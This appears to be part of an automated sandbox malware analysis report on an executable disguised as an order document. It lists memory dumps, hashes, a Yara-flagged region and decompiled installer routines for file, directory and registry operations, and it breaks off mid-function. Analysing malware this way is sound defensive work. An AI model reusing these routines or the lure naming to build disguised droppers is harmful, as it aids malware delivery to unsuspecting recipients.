                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                              • String ID:
                                                              • API String ID: 2547128583-0
                                                              • Opcode ID: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                              • Instruction ID: 1e5dc79a2ed4663847ded95c08da113472191569ceef3ff13fe49cb738333a03
                                                              • Opcode Fuzzy Hash: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                              • Instruction Fuzzy Hash: 67E0863660422056D2105B745E44D3762A89F94700306043EFA42F2041DB789C32AB6D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: Window$EnableShow
                                                              • String ID:
                                                              • API String ID: 1136574915-0
                                                              • Opcode ID: a0400a1b9fb92a3480c647e1a3800c271ea7f123647fdd228604a41f3657c97f
                                                              • Instruction ID: b4fe0a8816f2230fb6c640b22720df2591e8103d6b5d86596318fd3cb962ccd0
                                                              • Opcode Fuzzy Hash: a0400a1b9fb92a3480c647e1a3800c271ea7f123647fdd228604a41f3657c97f
                                                              • Instruction Fuzzy Hash: B9E0C2326005009FCB10AFF5AF4999D3375EF90369710407FE402F10E1CABC9C408A2D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 68%
                                                              			E00405C07(WCHAR* _a4, long _a8, long _a12) {
                                                              				signed int _t5;
                                                              				void* _t6;
                                                              
                                                              				_t5 = GetFileAttributesW(_a4); // executed
                                                              				asm("sbb ecx, ecx");
                                                              				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                              				return _t6;
                                                              			}





                                                              0x00405c0b
                                                              0x00405c18
                                                              0x00405c2d
                                                              0x00405c33

                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,80000000,00000003,?,?,00000000,00403517,?), ref: 00405C0B
                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,00403517,?), ref: 00405C2D
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesCreate
                                                              • String ID:
                                                              • API String ID: 415043291-0
                                                              • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                              • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                              • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                              • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00405BE2(WCHAR* _a4) {
                                                              				signed char _t3;
                                                              				signed char _t7;
                                                              
                                                              				_t3 = GetFileAttributesW(_a4); // executed
                                                              				_t7 = _t3;
                                                              				if(_t7 != 0xffffffff) {
                                                              					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                              				}
                                                              				return _t7;
                                                              			}





                                                              0x00405be7
                                                              0x00405bed
                                                              0x00405bf2
                                                              0x00405bfb
                                                              0x00405bfb
                                                              0x00405c04

                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,?,004057E7,?,?,00000000,004059BD,?,?,?,?), ref: 00405BE7
                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405BFB
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                              • Instruction ID: 2c4e6be97b113ceed9239146329651d13cb313475d1ce615590156906e373da3
                                                              • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                              • Instruction Fuzzy Hash: 07D01272504520AFC2102738EF0C89BBF55EB543717064B35FAF9A22F0CB314C56DA98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004056DD(WCHAR* _a4) {
                                                              				int _t2;
                                                              
                                                              				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                              				if(_t2 == 0) {
                                                              					return GetLastError();
                                                              				}
                                                              				return 0;
                                                              			}




                                                              0x004056e3
                                                              0x004056eb
                                                              0x00000000
                                                              0x004056f1
                                                              0x00000000

                                                              APIs
                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403270,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A9), ref: 004056E3
                                                              • GetLastError.KERNEL32 ref: 004056F1
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID:
                                                              • API String ID: 1375471231-0
                                                              • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                              • Instruction ID: 43b8cc017be4ea794887f60b7ff78796ccb4e437ad0dace2cbd4982aac0f1f36
                                                              • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                              • Instruction Fuzzy Hash: 02C04C30614602DBD6105B20DE08B177950EB54781F518839614AE11A0DA768455FF2D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 70%
                                                              			E00401673() {
                                                              				int _t7;
                                                              				void* _t13;
                                                              				void* _t15;
                                                              				void* _t20;
                                                              
                                                              				_t18 = E00402BBF(0xffffffd0);
                                                              				_t16 = E00402BBF(0xffffffdf);
                                                              				E00402BBF(0x13);
                                                              				_t7 = MoveFileW(_t4, _t5); // executed
                                                              				if(_t7 == 0) {
                                                              					if( *((intOrPtr*)(_t20 - 0x24)) == _t13 || E00406375(_t18) == 0) {
                                                              						 *((intOrPtr*)(_t20 - 4)) = 1;
                                                              					} else {
                                                              						E00405ED3(_t15, _t18, _t16);
                                                              						_push(0xffffffe4);
                                                              						goto L5;
                                                              					}
                                                              				} else {
                                                              					_push(0xffffffe3);
                                                              					L5:
                                                              					E00401423();
                                                              				}
                                                              				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t20 - 4));
                                                              				return 0;
                                                              			}







                                                              0x0040167c
                                                              0x00401685
                                                              0x00401687
                                                              0x0040168e
                                                              0x00401696
                                                              0x004016a2
                                                              0x0040281e
                                                              0x004016b6
                                                              0x004016b8
                                                              0x004016bd
                                                              0x00000000
                                                              0x004016bd
                                                              0x00401698
                                                              0x00401698
                                                              0x004021dc
                                                              0x004021dc
                                                              0x004021dc
                                                              0x00402a4f
                                                              0x00402a5b

                                                              APIs
                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 0040168E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: FileMove
                                                              • String ID:
                                                              • API String ID: 3562171763-0
                                                              • Opcode ID: c3778459728d826bbdac694ea121f0bef50cf8d752e3b99a0464db8e1b3f2e90
                                                              • Instruction ID: 39a705c871337a298e289750b84dd0ffd285fe21b7fc35a555db8342d30c8454
                                                              • Opcode Fuzzy Hash: c3778459728d826bbdac694ea121f0bef50cf8d752e3b99a0464db8e1b3f2e90
                                                              • Instruction Fuzzy Hash: 38F0B431604114A7CB10BBBA4F0DD5F32A59B82338B24467BF911F21D5DAFC8A4186AF
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EnumWindows
                                                              • String ID:
                                                              • API String ID: 1129996299-0
                                                              • Opcode ID: 3fc0ef24de34a6110cc5c89b7c9732723c54922661528c7e9ced36574310adbe
                                                              • Instruction ID: 4868c5e089fc1633234a14fca1d55752fe158a97e13c4331a52ead81047149f3
                                                              • Opcode Fuzzy Hash: 3fc0ef24de34a6110cc5c89b7c9732723c54922661528c7e9ced36574310adbe
                                                              • Instruction Fuzzy Hash: CCF0E5B95546888FC719DF18DC607D93B61BFC7224F54443DCA468BB91DA321956CA80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 34%
                                                              			E00402786(void* __eflags) {
                                                              				long _t7;
                                                              				long _t9;
                                                              				LONG* _t11;
                                                              				void* _t13;
                                                              				void* _t15;
                                                              				void* _t17;
                                                              
                                                              				_push(ds);
                                                              				if(__eflags != 0) {
                                                              					_t7 = E00402BA2(2);
                                                              					_t9 = SetFilePointer(E00405F92(_t13, _t15), _t7, _t11,  *(_t17 - 0x20)); // executed
                                                              					if( *((intOrPtr*)(_t17 - 0x28)) >= _t11) {
                                                              						_push(_t9);
                                                              						_push( *((intOrPtr*)(_t17 - 0x10)));
                                                              						E00405F79();
                                                              					}
                                                              				}
                                                              				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t17 - 4));
                                                              				return 0;
                                                              			}









                                                              0x00402786
                                                              0x00402787
                                                              0x00402793
                                                              0x004027a0
                                                              0x004027a9
                                                              0x004029ee
                                                              0x004029ef
                                                              0x004029f2
                                                              0x004029f2
                                                              0x004027a9
                                                              0x00402a4f
                                                              0x00402a5b

                                                              APIs
                                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                                • Part of subcall function 00405F79: wsprintfW.USER32 ref: 00405F86
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: FilePointerwsprintf
                                                              • String ID:
                                                              • API String ID: 327478801-0
                                                              • Opcode ID: e6b1ca666dcbd82e8a1de2ea37f9ef81104a41e8613c43d0bfa43493d1c7e0f2
                                                              • Instruction ID: 6e13d26e98101992f91f16a3b10818fa49d07bfc2575382a514d36e2453af549
                                                              • Opcode Fuzzy Hash: e6b1ca666dcbd82e8a1de2ea37f9ef81104a41e8613c43d0bfa43493d1c7e0f2
                                                              • Instruction Fuzzy Hash: 33E04F71701518AFDB41AFA59E4ACBF776AEB40328B14843BF105F00E1CABD8C119A2E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040172D() {
                                                              				long _t5;
                                                              				WCHAR* _t8;
                                                              				WCHAR* _t12;
                                                              				void* _t14;
                                                              				long _t17;
                                                              
                                                              				_t5 = SearchPathW(_t8, E00402BBF(0xffffffff), _t8, 0x400, _t12, _t14 + 8); // executed
                                                              				_t17 = _t5;
                                                              				if(_t17 == 0) {
                                                              					 *((intOrPtr*)(_t14 - 4)) = 1;
                                                              					 *_t12 = _t8;
                                                              				}
                                                              				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t14 - 4));
                                                              				return 0;
                                                              			}








                                                              0x00401741
                                                              0x00401747
                                                              0x00401749
                                                              0x004027ec
                                                              0x004027f3
                                                              0x004027f3
                                                              0x00402a4f
                                                              0x00402a5b

                                                              APIs
                                                              • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401741
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: PathSearch
                                                              • String ID:
                                                              • API String ID: 2203818243-0
                                                              • Opcode ID: 6c3bf02cedd953c02cf191020c70236bab39714c6f7018b829d4b0d23e56155e
                                                              • Instruction ID: b70941bc7738bb9b0414a64e3b7b2b1df016234940ef209bc10d8c2c44c885ef
                                                              • Opcode Fuzzy Hash: 6c3bf02cedd953c02cf191020c70236bab39714c6f7018b829d4b0d23e56155e
                                                              • Instruction Fuzzy Hash: 81E08071300100ABD750CFA4DE49AAA776CDF40378F20417BF515E61D1E6B49A41972D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 79%
                                                              			E00402CC9(void* __eflags, void* _a4) {
                                                              				short* _t8;
                                                              				intOrPtr _t9;
                                                              				signed int _t11;
                                                              
                                                              				_t8 = E00402BBF(0x22);
                                                              				_t9 =  *0x40cdc8; // 0x2f6fc4c
                                                              				_t3 = _t9 + 4; // 0x160
                                                              				_t11 = RegOpenKeyExW(E00402CB4( *_t3), _t8, 0,  *0x7a8af0 | _a4,  &_a4); // executed
                                                              				asm("sbb eax, eax");
                                                              				return  !( ~_t11) & _a4;
                                                              			}






                                                              0x00402cdd
                                                              0x00402ce3
                                                              0x00402ce8
                                                              0x00402cf1
                                                              0x00402cf9
                                                              0x00402d01

                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(00000000,00000160,00000000,00000022,00000000,?,?,?,0040232B,00000002), ref: 00402CF1
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              • Opcode ID: 9da2ebaaada2ed444504018bdaab7b440fc23c9bd071d66725cd28ab7958d0a8
                                                              • Instruction ID: 818ee9457f1dd57358e842bea021a20957f37b1b048482a93cb04bcf3cfa71ad
                                                              • Opcode Fuzzy Hash: 9da2ebaaada2ed444504018bdaab7b440fc23c9bd071d66725cd28ab7958d0a8
                                                              • Instruction Fuzzy Hash: DBE08676250108BFDB00DFA8DE47FD537ECAB44700F008021BA08D70D1C774E5408768
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00405C8A(void* _a4, void* _a8, long _a12) {
                                                              				int _t7;
                                                              				long _t11;
                                                              
                                                              				_t11 = _a12;
